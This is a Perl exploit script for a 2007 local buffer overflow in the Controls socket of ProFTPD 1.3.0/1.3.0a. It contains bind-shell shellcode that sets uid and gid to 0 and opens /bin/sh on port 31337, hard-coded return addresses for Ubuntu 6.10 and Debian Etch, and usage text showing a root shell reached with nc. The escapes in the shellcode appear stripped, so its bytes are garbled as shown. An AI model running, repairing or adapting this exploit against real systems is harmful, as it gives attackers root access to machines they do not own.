#!/usr/bin/perl -w
#
# $Id: revenge_proftpd_ctrls_26.pl, v1.1 2007/02/18 19:30:25 revenge Exp $
#
# ProFTPD v1.3.0/1.3.0a Controls Buffer Overflow Exploit
#
# Original Advisory :
# http://www.coresecurity.com/?action=item&id=1594
#
# [ Exploitation condition ]
# - proftpd must be compiled with --enable-ctrls option
# - local user needs permission to connect through unix socket (from proftpd.conf)
#
# This one works for 2.6 exploitation against gcc 4.x
# Payload will bind /bin/sh on port 31337 with ( uid && gid = 0 )
# I was able to use only a <bind_shell> as payload since a normal (setuid + execve) seems that doesn\'t work
#
# Tested against:
# - ProFTPD 1.3.0/1.3.0a on Ubuntu 6.10 compiled with gcc 4.1.2
# - ProFTPD 1.3.0/1.3.0a on Debian Etch(4.0.2-5) compiled with gcc 4.0.3
# *** Against v1.3.0a -- server *could* remain up (in a Denial of Service condition) without binding shell
#
# revenge@eleusi~$ ./revenge_proftpd_ctrls.pl /usr/local/var/proftpd/proftpd.sock 1
# [ wait some secs then nc on port 31337 ]
# anyone@anywhere:~$ nc <host> 31337
# id
# uid=0(root) gid=0(root) groups=65534(nogroup)
# exit
# [ after that server will deactivate ]
#
# See also : http://www.0xcafebabe.it/sploits/revenge_proftpd_ctrls_24.pl
#
# Alfredo \"revenge\" Pesoli
#
# http://www.0xcafebabe.it/
# <revenge@0xcafebabe.it>
#
use strict;
use Socket;
if ( @ARGV < 2 ) { &usage(); }
my $hellcode =
# *** Generated with libShellCode
# setuid(0) + setgid(0) + bind(/bin/sh) on port 31337
\"x31xc0x31xdbxb0x17xcdx80x31xc0x31xdbxb0x2excdx80\".
\"x31xdbxf7xe3xb0x66x53x43x53x43x53x89xe1x4bxcdx80\".
\"x89xc7x31xc9x66xb9x7ax69x52x66x51x43x66x53x89xe1\".
\"xb0x10x50x51x57x89xe1xb0x66xcdx80xb0x66xb3x04xcd\".
\"x80x31xc0x50x50x57x89xe1xb3x05xb0x66xcdx80x89xc3\".
\"x89xd9xb0x3fx49xcdx80x41xe2xf8xebx18x5ex31xc0x88\".
\"x46x07x89x76x08x89x46x0cxb0x0bx89xf3x8dx4ex08x8d\".
\"x56x0cxcdx80xe8xe3xffxffxffx2fx62x69x6ex2fx73x68\";
my $rsock = shift;
my $tn = shift;
my $ret;
my $req;
if ( $tn == \'1\' ) { $req = \"A\"x512; }
else { $req = \"A\"x520; }
use constant LSOCK => \'/tmp/tmp.sock\';
use constant CANARY => \"x0axff\";
use constant JUNK => \"AAAAaaaaAAAAaaaa\";
my %targets = (
\'1\' => \"x77xe7xffxff\", # Ubuntu 6.10
\'2\' => \"x77xe7xffxff\" # Debian Etch 4.0.2-5
# Add here your target RET
);
my %tname = (
\'1\' => \"Ubuntu 6.10\",
\'2\' => \"Debian Etch 4.0.2-5\"
);
$ret = $targets{$tn};
my $buffer = $req.CANARY.JUNK.$ret.$hellcode;
my $l = length($buffer);
socket (SOCK, PF_UNIX, SOCK_STREAM, 0) or die \"Unable to create socket : $!\";
my $rfile = sockaddr_un($rsock);
unlink LSOCK;
my $lfile = sockaddr_un(LSOCK);
bind (SOCK, $lfile) or die \"Unable to bind to $lfile\";
chmod (00700, LSOCK);
connect (SOCK, $rfile) or die \"
Unable to connect to \".$rsock.\"
Maybe server is down or incorrect path
\";
print \"
Buffer length => \".$l.\"
\";
print \" Target => \".$tname{$tn}.\"
\";
send SOCK, pack(\"s2\", 0),0;
send SOCK, pack(\"s2\", 1,0),0;
send SOCK, pack(\"C\", 188).pack(\"C\",2).pack(\"s1\",0),0;
send SOCK, $buffer,0;
close SOCK;
print \"
[#] Request sent - try to connect on port 31337
\";
sub usage() {
print \"
ProFTPD 1.3.0/1.3.0a Controls Buffer Overflow
\";
print \" Alfredo \"revenge\" Pesoli
\";
print \" <revenge@0xcafebabe.it>
\";
print \"Usage : $0 <path_to_unix_socket> <target>
\";
print \" Ex : $0 /usr/local/var/proftpd/proftpd.sock 1
\";
print \"
Available Targets :
\";
print \" 1 => 0xffffe777 (Ubuntu 6.10 - EIP after 532 bytes)
\";
print \" 2 => 0xffffe777 (Debian Etch 4.0.2-5 - EIP after 540 bytes)
\";
exit();
}
暂无评论